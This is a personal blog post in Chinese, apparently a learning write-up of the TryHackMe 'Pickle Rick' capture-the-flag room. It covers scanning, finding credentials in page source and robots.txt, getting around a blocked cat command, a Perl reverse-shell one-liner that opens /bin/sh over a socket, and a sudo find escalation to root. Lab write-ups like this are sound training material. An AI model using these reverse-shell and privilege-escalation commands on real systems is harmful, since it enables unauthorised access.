<!DOCTYPE html><html lang="en" theme-mode="dark"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>THM-Pickle_Rick | hybcx's blog</title><link rel="icon" type="image/x-icon" href="/favicon.ico"><script>var config = {"root":"/","search":{"preload":false,"activeHolder":"Enter here","blurHolder":"Search","noResult":"Data \"$0\" not found"},"code":{"codeInfo":"$0 - $1 lines","copy":"code.copy","copyFinish":"code.copyFinish","expand":"code.expand"}}</script><link rel="stylesheet" href="//unpkg.com/@waline/client@v2/dist/waline.css"><script src="//unpkg.com/mermaid@9.2.2/dist/mermaid.min.js"></script><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lightgallery.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-zoom.css"><link type="text/css" rel="stylesheet" href="//unpkg.com/lightgallery@2.7.1/css/lg-thumbnail.css"><link type="text/css" rel="stylesheet" href="/lib/fontawesome/css/all.min.css"><link rel="stylesheet" href="/css/arknights.css"><script>if (window.localStorage.getItem('theme-mode') === 'light') document.documentElement.setAttribute('theme-mode', 'light')
if (window.localStorage.getItem('theme-mode') === 'dark') document.documentElement.setAttribute('theme-mode', 'dark')</script><style>@font-face {
 font-family: BenderLight;
 src: local('Bender'), url("/font/BenderLight.ttf");
}
@font-face {
 font-family: 'JetBrains Mono';
 src: local('JetBrains Mono'), url('/font/JetBrainsMono-Regular.woff2') format('woff2');
}</style><style>:root {
  --dark-background: url('https://ak.hypergryph.com/assets/index/images/ak/pc/bk.jpg');
  --light-background: url('/img/bk.jpg');
}</style><meta name="generator" content="Hexo 6.3.0"></head><body><div class="loading" style="opacity: 0;"><div class="loadingBar left"></div><div class="loadingBar right"></div></div><main><header class="closed"><nav><div class="navBtn"><i class="navBtnIcon"><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span><span class="navBtnIconBar"></span></i></div><div class="navItem" id="search-header"><span class="navItemTitle"><input autocomplete="off" autocorrect="off" autocapitalize="none" placeholder="Search" spellcheck="false" maxlength="50" type="text" id="search-input"></span></div><div class="navItem" id="search-holder"></div><div class="search-popup"><div id="search-result"></div></div><ol class="navContent"><li class="navItem"><a class="navBlock" href="/"><span class="navItemTitle">Home</span></a></li><li class="navItem" matchdata="categories,tags"><a class="navBlock" href="/archives/"><span class="navItemTitle">Archives</span></a></li><li class="navItem"><a class="navBlock" href="/friends/"><span class="navItemTitle">Friends</span></a></li><li class="navItem"><a class="navBlock" href="/about"><span class="navItemTitle">About</span></a></li></ol></nav></header><div id="shadow-header"></div><article><div id="post-bg"><div id="post-title"><h1>THM-Pickle_Rick</h1><div id="post-info"><span>First Post: <div class="control"><time datetime="2024-03-10T00:06:45.591Z" id="date"> 2024-03-10</time></div></span><br><span>Last Update: <div class="control"><time datetime="2024-03-10T02:04:36.898Z" id="updated"> 2024-03-10</time></div></span><br><span>Word Count: <div class="control">1.1k</div></span><br><span>Read Time: <div class="control">4 min</div></span></div></div><hr><div id="post-content"><h1>0x01 实验任务</h1>
<p>这个以瑞克和莫蒂为主题的挑战要求你利用网络服务器并找到三种成分来帮助瑞克制作魔药，并将自己从泡菜变回人类。</p>
<p>在此任务上部署虚拟机并探索 Web 应用程序：10.10.74.56</p>
<h1>0x02 实验开始</h1>
<h2 id="nmap扫描"><a href="#nmap扫描" class="headerlink" title="nmap扫描"></a>nmap扫描</h2>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scss">nmap -T4 -sC -sV -<span class="hljs-selector-tag">p</span>- <span class="hljs-number">10.10</span><span class="hljs-selector-class">.74</span><span class="hljs-selector-class">.56</span><br></code></pre></td></tr></table></figure>
<p class='item-img' data-src='https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310082449512.png'><img src="https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310082449512.png" alt="image-20240310082449512"></p>
<p>可以看到开启了两个端口，我们先访问一下web端口</p>
<p class='item-img' data-src='https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310082727353.png'><img src="https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310082727353.png" alt="image-20240310082727353"></p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs scss">听莫蒂……我需要你的帮助，我又把自己变成了一个泡菜，这次我不能再变回去了!<br><br><br>我需要你*BURRRP*....莫蒂，登录我的电脑，找到最后三种秘密成分来完成我的酸黄瓜反药。唯一的问题是，我不知道密码是什么!救命，莫蒂，救命!<br></code></pre></td></tr></table></figure>
<p>那就是要找到密码了，直接扫一手目录</p>
<h2 id="目录扫描"><a href="#目录扫描" class="headerlink" title="目录扫描"></a>目录扫描</h2>
<p class='item-img' data-src='https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310084227350.png'><img src="https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310084227350.png" alt="image-20240310084227350"></p>
<p>不过在扫目录的时候，手动看了看web站点，发现源码还有用户名：R1ckRul3s</p>
<p class='item-img' data-src='https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310083241116.png'><img src="https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310083241116.png" alt="image-20240310083241116"></p>
<p>访问robots.txt得到：Wubbalubbadubdub ——猜测这个是密码，结合上面的用户名，我们访问login.php尝试登录</p>
<p class='item-img' data-src='https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310084609386.png'><img src="https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310084609386.png" alt="image-20240310084609386"></p>
<p>发现登陆成功，之后探索一番发现只有commands命令页面能访问。其他都无权限（需要真正的Rick权限）</p>
<p>那我们只能在这里搜集一下看有没有信息了，使用ls看到含有两个可以的txt文件</p>
<p class='item-img' data-src='https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310085030202.png'><img src="https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310085030202.png" alt="image-20240310085030202"></p>
<p>当我们尝试cat读取时，发现命令被禁，那就换其他，这里很幸运，tac读取即可：mr. meeseek hair</p>
<p class='item-img' data-src='https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310085120397.png'><img src="https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310085120397.png" alt="image-20240310085120397"></p>
<p>很幸运，这个就是第一个原料，接下来读取clue.txt：让我们在文件系统中找其他材料（成分）</p>
<p>这里我查看根目录，发现一个home，认为很可疑，其中含有rick，rick目录下又含有</p>
<p class='item-img' data-src='https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310085929097.png'><img src="https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310085929097.png" alt="image-20240310085929097"></p>
<p>很幸运，找到了第二个材料，这里读取的时候发现什么结果也没有，我以为又是命令被禁还是啥的，迷茫了半天，结果就在页面源代码处，是一段base64编码，不过需要解码6，7次才ok。如下图所示：rabbit hole</p>
<p class='item-img' data-src='https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310085842358.png'><img src="https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310085842358.png" alt="image-20240310085842358"></p>
<p>但不知道这里意味着什么，然后就不知道第二个材料咋搞了。。。看了wp发现second ingredients就是一个文件名（只不过中间空格分开了）这里虽然想到过，但没尝试。</p>
<p>直接<code>tac /home/rick/'second ingredients'</code>，得到第二个材料：1 jerry tear</p>
<h2 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h2>
<p>这里看过wp发现都是采取了反弹shell，我们也搞一下：</p>
<p>这里尝试了半天，发现perl命令可以被执行</p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scss">perl -e &#x27;use Socket;<span class="hljs-variable">$i</span>=&quot;<span class="hljs-number">10.10</span><span class="hljs-selector-class">.74</span><span class="hljs-selector-class">.56</span>&quot;;<span class="hljs-variable">$p</span>=<span class="hljs-number">5555</span>;<span class="hljs-built_in">socket</span>(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));<span class="hljs-built_in">if</span>(connect(S,sockaddr_in($p,inet_aton($i))))&#123;<span class="hljs-built_in">open</span>(STDIN,&quot;&gt;&amp;S&quot;);<span class="hljs-built_in">open</span>(STDOUT,&quot;&gt;&amp;S&quot;);<span class="hljs-built_in">open</span>(STDERR,&quot;&gt;&amp;S&quot;);<span class="hljs-built_in">exec</span>(&quot;/bin/sh -i&quot;);&#125;;&#x27;<br></code></pre></td></tr></table></figure>
<p>拿到之后，大概率就是读取root目录了，但很明显没权限，想到提权，看一下sudo -l</p>
<p class='item-img' data-src='https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310091845134.png'><img src="https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310091845134.png" alt="image-20240310091845134"></p>
<p>这里我忘了ALL的含义，我估摸着就是很多命令都能用啥的，我直接尝试find的sudo提权了</p>
<h2 id="find提权"><a href="#find提权" class="headerlink" title="find提权"></a>find提权</h2>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs scss">sudo find . -exec /bin/sh \; -quit<br></code></pre></td></tr></table></figure>
<p>输入之后也是成功提权</p>
<p class='item-img' data-src='https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310091941565.png'><img src="https://gitee.com/he-yi-beichen-star/local_images/raw/master/images/image-20240310091941565.png" alt="image-20240310091941565"></p>
<p>最后也是成功检索到第三个材料</p>
<h1>0x03 总结</h1>
<p>这里先根据wp看一下自己做题思路的不足</p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs scss">上图中的 cat &#x27;second ingredients&#x27; 之所以加单引号是因为该名称中间存在空格<br>如果不加引号 则只能识别到second而不是second ingredients<br>也可以尝试用其他方式处理：second\ ingredients或者&quot;second ingredients&quot;<br></code></pre></td></tr></table></figure>
<blockquote>
<p>(ALL) NOPASSWD: ALL这代表当前用户可以使用sudo去执行任何命令,而且不需要输入密码</p>
</blockquote>
<p>也就是说我上述的提权，就是自作多情（-.-）</p>
<p>关于less命令：less命令 的作用与more十分相似，都可以用来浏览文字档案的内容，不同的是less命令允许用户向前或向后浏览文件，而more命令只能向前浏览</p>
<p>另外就是做题思路了，大体框架有了初步定型，就是对于某些工具命令的使用犹豫不定。</p>
<p>比如nmap现在还不知道频繁得去使用哪一种，今后再做的时候多注意总结一番。</p>
<h1>0x04 参考文章</h1>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/Hekeats-L/p/16734869.html">【THM】Pickle Rick-练习</a></p>
<div id="paginator"></div></div><div id="post-footer"><div id="pages" style="justify-content: flex-end"><div class="footer-link" style="width: 50%;right:1px;border-left:1px #fe2 solid"><a href="/2024/03/04/THM-%E5%87%AD%E6%8D%AE%E6%94%B6%E9%9B%86/">THM-Credentials Harvesting(凭据收集) Prev →</a></div></div></div><div id="comments"><div id="waline"></div></div></div><div class="bottom-btn"><div><a class="i-top" id="to-top" onClick="scrolls.scrolltop();" title="To Top" style="opacity: 0; display: none;">∧</a><a class="i-index" id="to-index" href="#toc-div" title="To Catalog">≡</a><a class="i-color" id="color-mode" onClick="colorMode.change()" title="Change Theme"></a></div></div></article><aside><div id="about"><a href="/" id="logo"><img src="https://ak.hypergryph.com/assets/index/images/ak/pc/faction/1.png" alt="Logo"></a><h1 id="Dr"><a href="/">hybcx</a></h1><div id="description"><p></p></div></div><div id="aside-block"><div id="toc-div"><h1>Catalog</h1><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">1.</span> <span class="toc-text">0x01 实验任务</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">2.</span> <span class="toc-text">0x02 实验开始</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#nmap%E6%89%AB%E6%8F%8F"><span class="toc-number">2.1.</span> <span class="toc-text">nmap扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%9B%AE%E5%BD%95%E6%89%AB%E6%8F%8F"><span class="toc-number">2.2.</span> <span class="toc-text">目录扫描</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">2.3.</span> <span class="toc-text">反弹shell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#find%E6%8F%90%E6%9D%83"><span class="toc-number">2.4.</span> <span class="toc-text">find提权</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">3.</span> <span class="toc-text">0x03 总结</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">4.</span> <span class="toc-text">0x04 参考文章</span></a></li></ol></div></div><footer><nobr>Published with <a target="_blank" rel="noopener" href="http://hexo.io">Hexo</a></nobr><wbr><nobr> Theme <a target="_blank" rel="noopener" href="https://github.com/Yue-plus/hexo-theme-arknights">Arknights</a></nobr><wbr><nobr>by <a target="_blank" rel="noopener" href="https://github.com/Yue-plus">Yue_plus</a></nobr></footer></aside><div id="shadow-aside"></div></main><canvas id="canvas-dust"></canvas><script src="/js/search.js"></script><script type="module">import { init } from 'https://unpkg.com/@waline/client@v2/dist/waline.mjs';
window.waline = init;
</script><script src="/js/arknights.js"></script><script src="//unpkg.com/lightgallery@2.7.1/lightgallery.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/zoom/lg-zoom.min.js"></script><script src="//unpkg.com/lightgallery@2.7.1/plugins/thumbnail/lg-thumbnail.min.js"></script><script src="/js/pjax.js"></script><script class="pjax-js">reset= () => {if (document.querySelector('#waline'))
 waline({
   el: '#waline',
   dark: ':root[theme-mode="dark"]',
   serverURL: 'https://waline-blog-iwqdtxise-hybchenxing.vercel.app',
   path: window.location.pathname,
 });document.querySelector('.lg-container')?.remove()
lightGallery(document.getElementById('post-bg'), {
  plugins: [lgZoom,lgThumbnail],
  selector: '.item-img'})}</script><script>window.addEventListener("load",() => {pjax = new Pjax({
 cacheBust: false,
 selectors: ['title','article','#aside-block','.pjax-js'],
 switches: {'article': Pjax.switches.sideBySide},
 switchesOptions: {
   'article': {
     classNames: {
       remove: "pjax-out",
       add: "pjax-in"
     }
   }
 }
});
document.addEventListener("pjax:complete", reset);reset()})</script></body></html>